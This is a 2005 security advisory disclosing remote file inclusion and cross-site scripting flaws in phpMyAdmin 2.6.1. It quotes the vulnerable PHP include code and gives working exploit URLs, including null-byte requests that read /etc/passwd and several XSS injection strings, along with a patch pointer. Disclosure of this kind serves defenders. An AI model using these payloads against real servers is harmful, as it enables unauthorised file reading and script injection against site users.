phpMyAdmin261.txt

`  
  
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
[phpMyAdmin 2.6.1 Remote file inclusion and XSS cXIb8O3.4]  
  
Author: Maksymilian Arciemowicz (cXIb8O3)  
Date: 24.2.2005  
  
  
- --- 0.Description ---  
phpMyAdmin 2.6.1 is a tool written in PHP intended to  
handle the administration of MySQL over the Web.  
Currently it can create and drop databases,  
create/drop/alter tables, delete/edit/add fields,  
execute any SQL statement, manage keys on fields.  
  
- --- 1. Remote file inclusion ---  
  
1.0  
  
This bug exist in css/phpmyadmin.css.php. You can  
include files. Error exist in  
  
Code:  
- ------  
$tmp_file = $GLOBALS['cfg']['ThemePath'] . '/' .  
$theme . '/css/theme_right.css.php';  
if (@file_exists($tmp_file)) {  
include($tmp_file);  
} // end of include theme_right.css.php  
- ------  
  
And now you can get files.  
  
For exemple:  
  
http://[HOST]/[DIR]/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc/passwd%00&theme=passwd%00  
http://[HOST]/[DIR]/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc&theme=passwd%00  
etc.  
  
1.1  
Or next include is in libraries/database_interface.lib.php  
  
Code:  
  
- ---  
18# require_once('./libraries/dbi/' . $cfg['Server']['extension'] . '.dbi.lib.php');  
- ---  
  
For exemple:  
  
http://[HOST]/[DIR]/libraries/database_interface.lib.php?cfg[Server][extension]=cXIb8O3  
  
Error message :  
- ---------------  
Warning: main(./libraries/dbi/cXIb8O3.dbi.lib.php)  
[function.main]: failed to open stream: No such file or  
directory in  
/www/phpMyAdmin-2.6.1/libraries/database_interface.lib.php  
on line 18  
  
Fatal error: main() [function.require]: Failed opening  
required './libraries/dbi/cXIb8O3.dbi.lib.php'  
(include_path='.:') in  
/www/phpMyAdmin-2.6.1/libraries/database_interface.lib.php  
on line 18  
- ---------------  
  
  
Or if you want and if you see php error and register_globals=on, can you make  
xss with php buq. For Exemple:  
  
http://[HOST]/[DIR]/libraries/database_interface.lib.php?cfg[Server][extension]=%3Ch1%3EHi.%20I%20am%20cXIb8O3%3C/h1%3E  
  
- --- 2. XSS aka Cross Site Scripting ---  
If register_globals=On:  
  
2.0  
http://[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&show_server_left=MyToMy&strServer=[XSS%20code]  
  
http://[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&cfg[BgcolorOne]=777777%22%3E%3CH1%3E[XSS%20code]  
  
http://[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&strServerChoice=%3CH1%3EXSS  
  
2.1  
http://[HOST]/[DIR]/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&bgcolor=%22%3E[XSS%20code]  
  
http://[HOST]/[DIR]/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&row_no=%22%3E[XSS%20code]  
  
2.2  
http://[HOST]/[DIR]/themes/original/css/theme_left.css.php?num_dbs=0&left_font_family=[XSS]  
and more in this file.  
  
2.3  
http://[HOST]/[DIR]/themes/original/css/theme_right.css.php?right_font_family=[XSS]  
and more in this file.  
  
- --- 3. How to fix ---  
  
CVS or   
https://sourceforge.net/tracker/download.php?group_id=23067&atid=377408&file_id=122735&aid=1149381 >> libraries/grab_globals.lib.php or wait for new version..  
  
- --- 4. Greets ---  
  
sp3x.  
  
  
  
i need help.. :(  
  
- --- 5.Contact ---  
Author: Maksymilian Arciemowicz  
Location: Poland(Jelenia Gora), Luxembourg(Bereldange)  
Email: max [at] jestsuper [dot] pl  
GPG-KEY: http://security.jestsuper.pl  
http://securityreason.com/ Team  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.2.6 (FreeBSD)  
  
iD8DBQFCHR89znmvyJCR4zQRAtj3AJ4wxM3WEn56GNohsG3f4U8Ku+/I8wCeMWQr  
YklTAm82iDqNu3so1uYsmEk=  
=ko9x  
-----END PGP SIGNATURE-----  
`